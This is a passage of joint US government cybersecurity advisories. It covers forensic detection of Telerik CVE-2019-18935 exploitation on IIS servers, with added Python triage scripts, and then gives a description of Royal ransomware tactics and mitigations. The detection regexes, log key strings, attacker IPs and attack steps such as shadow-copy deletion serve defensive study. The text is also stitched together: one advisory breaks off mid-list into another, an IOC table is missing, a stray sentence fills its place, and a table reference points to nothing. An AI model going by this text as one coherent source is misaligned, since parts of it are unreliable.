2. Load the newly created DLL into a currently running IIS process, w3wp.exe PID 6484.
3. Make a TCP connection using w3wp.exe PID 6484 to 45.77.212[.]12 over port 443.
4. Invoke C:\Windows\System32\vcruntime140.dll (Windows C runtime library) to execute the payload.
Steps 1 and 2 occur every time a malicious DLL file is created. In some cases, an ASP .NET temp file was created, but this may have indicated benign IIS server activity. Note: The Process ID (PID) used in this example is unique to this investigation and is not universal. IP address 45.77.212[.]12 correlates to TA1, but the pattern can be used as general practice to identify similar activity.
Additional Searching for IIS Servers
The following information was derived from artifact analysis and is provided to equip IT infrastructure defenders searching for similar activity on an IIS server. Several artifacts can be referenced to assist in determining if CVE-2019-18935 has been successfully exploited.
File Type: DLL
Location: %SystemDrive%\Windows\Temp
When this CVE is exploited, it uploads malicious DLL files to the C:\Windows\Temp directory. The malicious DLL file naming convention translates to the exact time the file was uploaded to the server.
The time is represented in a series of digits, known as Unix Epoch time. The files observed during this investigation contained two sets of digits separated by a period (.) before the DLL extension (.dll). Example: 1667206973.2270932.dll
Nearly all recovered files contain a series of 10 digits to the left of the period (.) and seven digits to the right. However, one file contained only five digits in the second set, which should be taken into consideration when writing regex patterns to search for the existence of these files. Example Regex: \d{10}\.\d{1,8}\.dll
These numbers can be copied and translated from digits into readable language with the month, day, year, hour, minute, and seconds displayed.
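The naming convention and regex above can be turned into a small triage script. The following is an added example, not code from the advisory or from CISA; it scans a directory listing for names matching the Unix Epoch convention (accepting the five-digit fraction the advisory mentions) and converts each to a readable UTC time. The directory listing is constructed for the example; the two file names taken from the advisory text are used alongside constructed decoys.

```python
import re
from datetime import datetime, timezone

# Naming convention from the advisory: <10-digit epoch seconds>.<fraction>.dll
# The fraction is usually seven digits, but one recovered file had five,
# so the pattern accepts 1-8 digits, matching the advisory's example regex.
EPOCH_DLL_RE = re.compile(r"^(\d{10})\.(\d{1,8})\.dll$", re.IGNORECASE)


def parse_epoch_dll_name(filename):
    """Return (upload time as an aware UTC datetime, fraction string) for a file
    name that follows the convention, or None if it does not."""
    m = EPOCH_DLL_RE.match(filename)
    if not m:
        return None
    seconds = int(m.group(1))
    frac = m.group(2)
    # The second group is a decimal fraction of a second; pad/truncate to
    # microseconds so it can be stored in a datetime.
    micros = int((frac + "000000")[:6])
    when = datetime.fromtimestamp(seconds, tz=timezone.utc).replace(microsecond=micros)
    return when, frac


def find_epoch_dlls(filenames):
    """Given names from a directory listing (e.g. %SystemDrive%\\Windows\\Temp),
    return (filename, ISO-8601 UTC time) for each name matching the convention,
    sorted by upload time so the earliest upload is investigated first."""
    hits = []
    for name in filenames:
        parsed = parse_epoch_dll_name(name)
        if parsed:
            hits.append((name, parsed[0].isoformat()))
    hits.sort(key=lambda t: t[1])
    return hits


# Constructed sample listing (not a real victim directory). The first two names
# appear in the advisory; the rest are decoys that must not match.
SAMPLE_LISTING = [
    "1667206973.2270932.dll",
    "1665890187.8690152.dll",
    "1666000000.12345.dll",    # five-digit fraction edge case
    "vcruntime140.dll",        # legitimate runtime, should not match
    "166700697.2270932.dll",   # only nine digits: not the convention
    "1667206973.2270932.txt",  # wrong extension
]

if __name__ == "__main__":
    for name, when in find_epoch_dlls(SAMPLE_LISTING):
        print(f"{name} -> uploaded {when}")
```

The converted times can be fed straight into the IIS log search described next, which narrows the query window considerably.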
Log Type: IIS
Location: %SystemDrive%\inetpub\logs\LogFiles
When investigating IIS logs, specific fields were searched for and captured during the time of each connection.
If the Unix Epoch time signature has been translated from a DLL filename, specific logs can be searched based on that time. However, if the Unix Epoch time signature has not been translated, the following will still work, but may take longer for the query to run.
The four most important fields to identify this traffic are noted in the following table. These descriptions are sourced directly from Microsoft.[6]
Table 5: Four Fields Searched in IIS Logs

General Name    | Field Name   | Description
Method          | cs-method    | Requested action; for example, a GET method
URI Stem        | cs-uri-stem  | Universal Resource Identifier (URI), or target, of the action
URI Query       | cs-uri-query | The query, if any, that the client was trying to perform; a URI query is necessary only for dynamic pages.
Protocol Status | sc-status    | Hypertext Transfer Protocol (HTTP) or File Transfer Protocol (FTP) status code
Note: Depending on how logs are collected and stored, the field names may not be an exact match; this should be taken into consideration when constructing queries.
When ingesting logs into security information and event management (SIEM), the final field names did not use a hyphen (-) but used an underscore (_).
Example: cs_method instead of cs-method
Artifacts:
Table 6: Information Contained in Two Observed IIS Events

Field Name   | Artifact
cs-method    | POST
cs-uri-stem  | /Telerik.Web.UI.WebResource.axd
cs-uri-query | type=rau
sc-status    | 200 and 302
When reviewing logs, two IIS events were observed with the same timestamp each time this CVE-2019-18935 was exploited. Both events contained the same information in the cs-method, cs-uri-stem, and cs-uri-query. One event had a sc-status of 200 and the other had a sc-status of 302.
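The search described in Tables 5 and 6 can be automated over exported W3C IIS logs. The example below is added here and is not code from the advisory or from CISA. It parses the #Fields header, normalizes field names the way the advisory's SIEM did (cs-method becomes cs_method) so queries work on either spelling, groups Telerik RAU POSTs by timestamp and client, and flags the 200/302 pair observed for each exploitation. The optional around_epoch parameter accepts the Unix Epoch seconds recovered from a DLL name and restricts the search to a window around that time. The log lines, IP addresses and timing are constructed for the example.

```python
from datetime import datetime, timezone, timedelta

TELERIK_HANDLER = "/telerik.web.ui.webresource.axd"


def normalize_field(name):
    """cs-method -> cs_method, cs(User-Agent) -> cs_user_agent (SIEM-style names)."""
    return name.replace("-", "_").replace("(", "_").replace(")", "").lower()


def parse_iis_log(text):
    """Parse W3C extended IIS log text into a list of dicts keyed by normalized
    field names taken from the #Fields: directive. Rows whose column count does
    not match the header (truncated or garbled lines) are skipped."""
    fields, events = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = [normalize_field(f) for f in line[len("#Fields:"):].split()]
            continue
        if line.startswith("#"):
            continue  # #Software, #Version, #Date directives
        values = line.split()
        if len(values) != len(fields):
            continue
        events.append(dict(zip(fields, values)))
    return events


def is_rau_post(ev):
    """The request shape from Table 6: POST to the Telerik handler with type=rau."""
    return (ev.get("cs_method") == "POST"
            and ev.get("cs_uri_stem", "").lower() == TELERIK_HANDLER
            and "type=rau" in ev.get("cs_uri_query", "").lower())


def find_rau_events(events, around_epoch=None, window_seconds=60):
    """Group RAU POSTs by (date, time, client IP). Each result carries the HTTP
    status codes seen at that instant; 'paired' is True when both a 200 and a
    302 share the timestamp, the pattern the advisory observed per exploitation.
    If around_epoch is given, only events within window_seconds are considered."""
    ref = None
    if around_epoch is not None:
        ref = datetime.fromtimestamp(around_epoch, tz=timezone.utc)
    groups = {}
    for ev in events:
        if not is_rau_post(ev):
            continue
        ts = datetime.strptime(ev["date"] + " " + ev["time"],
                               "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
        if ref is not None and abs(ts - ref) > timedelta(seconds=window_seconds):
            continue
        key = (ev["date"], ev["time"], ev.get("c_ip", "?"))
        groups.setdefault(key, set()).add(ev.get("sc_status", "?"))
    results = []
    for (d, t, ip), statuses in sorted(groups.items()):
        results.append({"timestamp": f"{d} {t}", "client": ip,
                        "statuses": sorted(statuses),
                        "paired": {"200", "302"} <= statuses})
    return results


# Constructed sample log (documentation-range IPs, not victim data).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus time-taken
2022-10-31 09:02:53 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 443 - 203.0.113.7 Mozilla/5.0 200 0 120
2022-10-31 09:02:53 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 443 - 203.0.113.7 Mozilla/5.0 302 0 5
2022-10-31 09:05:10 10.0.0.5 GET /Default.aspx - 443 - 198.51.100.9 Mozilla/5.0 200 0 30
2022-10-31 09:40:00 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 443 - 203.0.113.7 Mozilla/5.0 200 0 50
"""

if __name__ == "__main__":
    events = parse_iis_log(SAMPLE_LOG)
    for hit in find_rau_events(events):
        print(hit)
    # Narrow to the minute around a DLL named 1667206973.<fraction>.dll
    print(find_rau_events(events, around_epoch=1667206973))
```

A lone RAU POST with a 200 is not by itself proof of exploitation (legitimate RadAsyncUpload traffic uses the same handler), which is why the paired 200/302 at one timestamp and the correlation with a DLL upload time are both reported.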
Kroll Artifact Parser and Extractor (KAPE), a forensic artifact collector and parser, was used to extract the Windows event logs from a backup image of the compromised IIS server. All field names refer to the labels provided via KAPE exports. The strings are of value and can be used to locate other artifacts if different tools are used. Note: The payload data in the following table has been shortened to only necessary strings to obscure and protect victim information.
Table 7: Example Payload Data

EventID | Payload
1309    | 3005, An unhandled exception has occurred[*redacted*]w3wp.exe[*redacted*]InvalidCastException, Unable to cast object of type 'System.Configuration.Install.AssemblyInstaller' to type 'Telerik.Web.UI.IAsyncUploadConfiguration'.\n at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)\n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()\n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)\n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)\n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)\n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()\n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)\n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)\n\n, [*redacted*]/Telerik.Web.UI.WebResource.axd?type=rau, /Telerik.Web.UI.WebResource.axd, [*redacted*], False, [*redacted*], 15, [*redacted*], False, at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)\n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()\n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)\n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)\n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)\n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()\n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)\n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)\n","Binary":""}}
Authoring organizations recommend looking for the following key strings in the payload:
w3wp.exe: This is the parent process that executes the code inside the malicious DLLs.
System.Configuration.Install.AssemblyInstaller: Figure 1 is from the creator’s GitHub repo,[7] where the string can be observed in the code. As presented by Bishop Fox and proven during authoring organizations’ investigation of IIS server logs, an exception does not mean that the exploit failed, but more likely that it executed successfully.[3]
Figure 1: Threat Actor Assembly Installer
If a Werfault crash report was written, Windows event application logs may contain evidence of this—even if the DLLs have been removed from the system as part of a cleanup effort by the threat actors.
The EventID field maps to Windows EventIDs for an easy filter. Users can leverage the Windows EventIDs to find malicious DLLs with the Unix Epoch time-based name inside the C:\Windows\Temp directory.
Depending how log analysis is performed, various filters can be determined. However, if regex is available, the example listed in Table 8 above can be reused to match the Unix Epoch timestamp convention to assist in filtering.
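As an added example (not code from the advisory or from CISA), the following triage routine applies the key strings recommended above to exported application-log records of the (EventID, Payload) shape that KAPE produces, and also pulls any Unix Epoch-named DLL path under Windows\Temp out of the payload, so a crash report that survived the actors' cleanup still yields the upload time. The sample records are constructed: the first is a shortened stand-in for the Table 7 payload, the second assumes a Windows Application Error (EventID 1000) record naming the faulting module, and the third is an unrelated application exception that must not be flagged.

```python
import re
from datetime import datetime, timezone

# Key strings from the advisory's guidance on application-log payloads.
KEY_STRINGS = {
    "w3wp_parent": "w3wp.exe",
    "assembly_installer": "System.Configuration.Install.AssemblyInstaller",
    "telerik_async_upload": "Telerik.Web.UI.AsyncUploadHandler",
    "rau_request": "Telerik.Web.UI.WebResource.axd?type=rau",
}
# Epoch-named DLL under <drive>:\Windows\Temp, as in the advisory's regex,
# here anchored to the path so ordinary numbers in a payload do not match.
EPOCH_DLL_PATH_RE = re.compile(
    r"[A-Za-z]:\\Windows\\Temp\\(\d{10})\.\d{1,8}\.dll", re.IGNORECASE)


def triage_event(event_id, payload):
    """Return the indicators present in one exported event record.

    An AssemblyInstaller InvalidCastException raised inside w3wp.exe is, per
    Bishop Fox and the advisory, a sign the deserialization ran, not that the
    exploit failed, so that combination (or a recovered DLL path) is reported
    as a likely exploitation."""
    found = [key for key, needle in KEY_STRINGS.items() if needle in payload]
    dll_times = [
        datetime.fromtimestamp(int(m.group(1)), tz=timezone.utc).isoformat()
        for m in EPOCH_DLL_PATH_RE.finditer(payload)
    ]
    likely = ("w3wp_parent" in found and "assembly_installer" in found) or bool(dll_times)
    return {"event_id": event_id, "indicators": found,
            "dll_times": dll_times, "likely_exploit": likely}


def triage_events(records):
    """Triage a list of (event_id, payload) pairs, keeping only records that
    carry at least one indicator so the analyst reviews the short list first."""
    results = [triage_event(eid, payload) for eid, payload in records]
    return [r for r in results if r["indicators"] or r["dll_times"]]


# Constructed sample records (not victim data).
SAMPLE_RECORDS = [
    (1309, "3005, An unhandled exception has occurred [redacted] w3wp.exe [redacted] "
           "InvalidCastException, Unable to cast object of type "
           "'System.Configuration.Install.AssemblyInstaller' to type "
           "'Telerik.Web.UI.IAsyncUploadConfiguration'. at "
           "Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData) "
           "[redacted]/Telerik.Web.UI.WebResource.axd?type=rau"),
    (1000, r"Faulting application name: w3wp.exe, Faulting module path: "
           r"C:\Windows\Temp\1665890187.8690152.dll"),
    (1309, "3005, An unhandled exception has occurred [redacted] w3wp.exe [redacted] "
           "NullReferenceException at ExampleApp.Default.Page_Load"),
]

if __name__ == "__main__":
    for result in triage_events(SAMPLE_RECORDS):
        print(result)
```

The third record shows why the strings are weighed together rather than individually: every ASP.NET exception on the server mentions w3wp.exe, and only the combination with the AssemblyInstaller cast failure (or a recovered epoch-named DLL) is specific to this CVE.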
Additional Analysis
When evidence of malicious DLLs is found, reverse engineering will need to be conducted to fully understand what actions occur as the malicious files could do nearly anything. Leveraging Windows security event logs, as well as Windows PowerShell logs, may provide insight into what actions the DLLs are taking. CISA and authoring organizations recommend the following process:
1. Convert any discovered malicious DLL timestamps to readable format.
2. Export the Windows security event and PowerShell logs from the device.
3. Search for new processes created via w3wp.exe in Windows security event logs (e.g., Windows EventID 4688 New Process created).
4. Search for new PIDs from identified events. Investigate to determine if they spawned any other processes.
   Example: CMD.EXE launching PowerShell or running other commands such as nslookup or netstat. Note: This is not an exhaustive list.
5. Search for EventID 600 in PowerShell logs.
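Steps 3 through 5 of that process, applied to exported logs, look like the following. This is an added example, not code from the advisory or from CISA. It builds the tree of processes created by w3wp.exe from Security EventID 4688 records, following each new PID to whatever it spawned in turn, and lists PowerShell EventID 600 engine starts for comparison against that tree. The records are constructed with the 4688 field names (ParentProcessName, NewProcessName, CommandLine) and are not taken from the victim's logs; the w3wp.exe PID 6484 echoes the advisory's example but is otherwise arbitrary.

```python
import ntpath
from collections import defaultdict


def image_name(path):
    """Lower-cased file name from a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def descendants_of_web_process(events, web_process="w3wp.exe"):
    """Walk Security 4688 records and return every process created, directly or
    indirectly, by the IIS worker process, as (depth, pid, image, command line)
    tuples in creation order. PID reuse is not modelled: on a busy server also
    confirm a child's creation time falls after its parent's."""
    creates = sorted((e for e in events if e.get("EventID") == 4688),
                     key=lambda e: e["Time"])
    by_parent = defaultdict(list)
    for ev in creates:
        by_parent[ev["ParentPID"]].append(ev)

    tree, seen = [], set()

    def walk(ev, depth):
        if ev["NewPID"] in seen:  # guard against PID cycles in messy exports
            return
        seen.add(ev["NewPID"])
        tree.append((depth, ev["NewPID"], image_name(ev["NewProcessName"]),
                     ev.get("CommandLine", "")))
        for child in by_parent.get(ev["NewPID"], []):
            walk(child, depth + 1)

    for ev in creates:
        if image_name(ev["ParentProcessName"]) == web_process:
            walk(ev, 1)
    return tree


def powershell_engine_starts(ps_events):
    """EventID 600 marks a PowerShell provider start; return (time, host) pairs
    so they can be lined up against the 4688 tree by timestamp."""
    return [(e["Time"], e.get("HostName", "")) for e in ps_events
            if e.get("EventID") == 600]


# Constructed sample records (not victim data).
SECURITY_EVENTS = [
    {"EventID": 4688, "Time": "2022-10-16T03:16:30Z", "ParentPID": 6484,
     "ParentProcessName": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "NewPID": 7120, "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c netstat -ano"},
    {"EventID": 4688, "Time": "2022-10-16T03:16:31Z", "ParentPID": 7120,
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "NewPID": 7124, "NewProcessName": r"C:\Windows\System32\NETSTAT.EXE",
     "CommandLine": "netstat -ano"},
    {"EventID": 4688, "Time": "2022-10-16T03:16:32Z", "ParentPID": 4100,
     "ParentProcessName": r"C:\Windows\explorer.exe",           # benign, unrelated
     "NewPID": 5000, "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
    {"EventID": 4688, "Time": "2022-10-16T03:17:05Z", "ParentPID": 6484,
     "ParentProcessName": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "NewPID": 7200, "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},
    {"EventID": 4688, "Time": "2022-10-16T03:17:06Z", "ParentPID": 7200,
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "NewPID": 7210,
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
]
POWERSHELL_EVENTS = [
    {"EventID": 600, "Time": "2022-10-16T03:17:06Z", "HostName": "ConsoleHost"},
    {"EventID": 400, "Time": "2022-10-16T03:17:06Z", "HostName": "ConsoleHost"},
]

if __name__ == "__main__":
    for depth, pid, image, cmdline in descendants_of_web_process(SECURITY_EVENTS):
        print("  " * depth + f"{image} (PID {pid}): {cmdline}")
    print(powershell_engine_starts(POWERSHELL_EVENTS))
```

On a healthy IIS server w3wp.exe rarely spawns a shell at all, so any branch in this tree deserves a look; the PowerShell 600 event at 03:17:06 lining up with the powershell.exe child confirms which engine start belongs to the suspicious chain.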
Trellix XDR Platform Searching
If Trellix XDR Platform is deployed in an environment and a standard HX triage audit is completed promptly after the suspected use of CVE-2019-18935, an organization can search for file write events from known web processes. This will identify the executables written by the web server process. CISA and authoring organizations specifically recommend searching for the following field value pair:
Table 9: Field Value Pair for Searching

Field              | Value Begins With
TextAtLowestOffset | MZ
MITIGATIONS
Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Manage Vulnerabilities and Configurations
Upgrade all instances of Telerik UI ASP.NET AJAX to the latest version after appropriate testing. Keep all software up to date and prioritize patching to known exploited vulnerabilities (KEVs). [CPG 5.1]
Implement a patch management solution to ensure compliance with the latest security patches. A patch management solution that inventories all software running in addition to vulnerability scanning is recommended.
Ensure vulnerability scanners are configured to scan a comprehensive scope of devices and locations. For example, as noted in the Technical Details section, the victim organization had the appropriate plugin for CVE-2019-18935, but the vulnerability went undetected due to the Telerik UI software being installed in a file path not typically scanned. To identify unpatched instances of software vulnerabilities, organizations using vulnerability scanners should be aware that all installations may not be considered “typical” and may require full file scans of web applications.
Note: Vulnerability scanners may have limitations in detecting vulnerabilities, such as only being able to identify Windows Installer-installed applications, which was the case with this agency’s vulnerability scanner. The Telerik UI software was installed via a continuous integration (CI) and continuous delivery (CD) pipeline rather than the Windows Installer. This highlights the importance of using a comprehensive approach for vulnerability scanning that considers all potential installation methods and file paths.
Validate output from patch management and vulnerability scanning solutions against running services to check for discrepancies and account for all services.
Segment Networks Based on Function
Implement network segmentation to separate network segments based on role and functionality. Proper network segmentation significantly reduces the ability for threat actor lateral movement by controlling traffic flows between—and access to—various subnetworks. (See CISA’s Layering Network Security Through Segmentation infographic and the National Security Agency’s Segment Networks and Deploy Application-Aware Defenses.) [CPG 8.1]
Isolate similar systems and implement micro-segmentation with granular access and policy restrictions to modernize cybersecurity and adopt zero trust principles for both network perimeter and internal devices. Logical and physical segmentation are critical to limiting and preventing lateral movement, privilege escalation, and exfiltration. Utilize access control lists (ACLs), hardened firewalls, and network monitoring devices to regulate, monitor, and audit cross-segment access and data transfers.
MFA can still be leveraged for secure access using a jump server—an asset placed between the external and internal networks that serves as an intermediary for access—to facilitate connections if assets do not have the capability to support MFA implementation.
For additional guidance on secure MFA configurations, visit cisa.gov/mfa. [CPG 1.3]
Monitor and analyze activity logs generated from Microsoft IIS and remote PowerShell. Collect access and security focused logs (IDS/IDPS, firewall, DLP, VPN) and ensure logs are securely stored for a specified duration informed by risk or pertinent regulatory guidance. [CPG 3.1, 3.2]
Evaluate user permissions and maintain separate user accounts for all actions and activities not associated with the administrator role, e.g., for business email, web browsing, etc. All privileges should be reevaluated on a recurring basis to validate continued need for a given set of permissions. [CPG 1.5]
Limit service accounts to the minimum permissions necessary to run services. CISA observed numerous error messages in network logs indicative of failed attempts to write files to additional directories or move laterally.
Maintain a robust asset management policy through comprehensive documentation of assets, tracking current version information to maintain awareness of outdated software, and mapping assets to business and critical functions.
Determine the need and functionality of assets that require public internet exposure. [CPG 2.3]
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, CISA, FBI, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and co-sealers recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
Select an ATT&CK technique described in this advisory (see Table 4).
Align your security technologies against the selected technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program—including people, processes, and technologies—based on the data generated by this process.
CISA, FBI, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
Actions to take today to mitigate cyber threats from ransomware:
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known Royal ransomware IOCs and TTPs identified through FBI threat response activities as recently as January 2023.
Since approximately September 2022, cyber criminals have compromised U.S. and international organizations with a Royal ransomware variant. FBI and CISA believe this variant, which uses its own custom-made file encryption program, evolved from earlier iterations that used “Zeon” as a loader. After gaining access to victims’ networks, Royal actors disable antivirus software and exfiltrate large amounts of data before ultimately deploying the ransomware and encrypting the systems. Royal actors have made ransom demands ranging from approximately $1 million to $11 million USD in Bitcoin. In observed incidents, Royal actors do not include ransom amounts and payment instructions as part of the initial ransom note. Instead, the note, which appears after encryption, requires victims to directly interact with the threat actor via a .onion URL (reachable through the Tor browser). Royal actors have targeted numerous critical infrastructure sectors including, but not limited to, Manufacturing, Communications, Healthcare and Public Healthcare (HPH), and Education.
FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.
Royal ransomware uses a unique partial encryption approach that allows the threat actor to choose a specific percentage of data in a file to encrypt. This approach allows the actor to lower the encryption percentage for larger files, which helps evade detection.[1] In addition to encrypting files, Royal actors also engage in double extortion tactics in which they threaten to publicly release the encrypted data if the victim does not pay the ransom.
Initial Access
Royal actors gain initial access to victim networks in a number of ways including:
Phishing. According to third-party reporting, Royal actors most commonly (in 66.7% of incidents) gain initial access to victim networks via successful phishing emails [T1566].
According to open-source reporting, victims have unknowingly installed malware that delivers Royal ransomware after receiving phishing emails containing malicious PDF documents [T1566.001], and malvertising [T1566.002].[2]
Remote Desktop Protocol (RDP). The second most common vector Royal actors use (in 13.3% of incidents) for initial access is RDP compromise.
Public-facing applications. FBI has also observed Royal actors gain initial access through exploiting public-facing applications [T1190].
Brokers. Reports from trusted third-party sources indicate that Royal actors may leverage brokers to gain initial access and source traffic by harvesting virtual private network (VPN) credentials from stealer logs.
Command and Control
Once Royal actors gain access to the network, they communicate with command and control (C2) infrastructure and download multiple tools [T1105]. Legitimate Windows software is repurposed by Royal operators to strengthen their foothold in the victim’s network. Ransomware operators often use open-source projects to aid their intrusion activities; Royal operators have recently been observed using Chisel, a tunneling tool transported over HTTP and secured via SSH [T1572], to communicate with their C2 infrastructure. FBI has observed multiple Qakbot C2s used in Royal ransomware attacks, but has not yet determined if Royal ransomware exclusively uses Qakbot C2s.
Lateral Movement and Persistence
Royal actors often use RDP to move laterally across the network [T1021.001]. Microsoft Sysinternals tool PsExec has also been used to aid lateral movement. FBI has observed Royal actors using remote monitoring and management (RMM) software, such as AnyDesk, LogMeIn, and Atera, for persistence in the victim’s network [T1133]. In some instances, the actors moved laterally to the domain controller. In one confirmed case, the actors used a legitimate admin account to remotely log on to the domain controller [T1078]. Once on the domain controller, the threat actor deactivated antivirus protocols [T1562.001] by modifying Group Policy Objects [T1484.001].
Exfiltration
Royal actors exfiltrate data from victim networks by repurposing legitimate cyber pentesting tools, such as Cobalt Strike, and malware tools and derivatives, such as Ursnif/Gozi, for data aggregation and exfiltration. According to third-party reporting, Royal actors’ first hop in exfiltration and other operations is usually a U.S. IP address.
Note: In reference to Cobalt Strike and other tools mentioned above, a tool repository used by Royal was identified at IP: 94.232.41[.]105 in December 2022.
Encryption
Before starting the encryption process, Royal actors:
Use Windows Restart Manager to determine whether targeted files are currently in use or blocked by other applications [T1486].[1]
Use Windows Volume Shadow Copy service (vssadmin.exe) to delete shadow copies to prevent system recovery.[1]
FBI has found numerous batch (.bat) files on impacted systems which are typically transferred as an encrypted 7zip file. Batch files create a new admin user [T1078.002], force a group policy update, set pertinent registry keys to auto-extract [T1119] and execute the ransomware, monitor the encryption process, and delete files upon completion—including Application, System, and Security event logs [T1070.001].
Malicious files have been found in victim networks in the following directories:
C:\Temp
C:\Users\<user>\AppData\Roaming
C:\Users
C:\ProgramData
Indicators of Compromise (IOC)
See table 1 and 2 for Royal ransomware IOCs that FBI obtained during threat response activities as of January 2023. Note: Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.
Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023
The actors encrypted data to determine which files were being used or blocked by other applications.
MITIGATIONS
FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA’s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, tactics, techniques, and procedures, and which yield goals that all organizations across critical infrastructure sectors should implement:
Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
Refrain from requiring password changes more frequently than once per year. Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.
Require administrator credentials to install software.
Require multifactor authentication [CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.
Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.
Segment networks [CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.
Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
Install, regularly update, and enable real time detection for antivirus software on all hosts.
Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 1.5].
Disable unused ports.
Consider adding an email banner to emails [CPG 8.3] received from outside your organization.
Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.
Maintain offline backups of data, and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures it will not be severely interrupted or left with only irretrievable data.
Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 3.3].
RESOURCES
Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
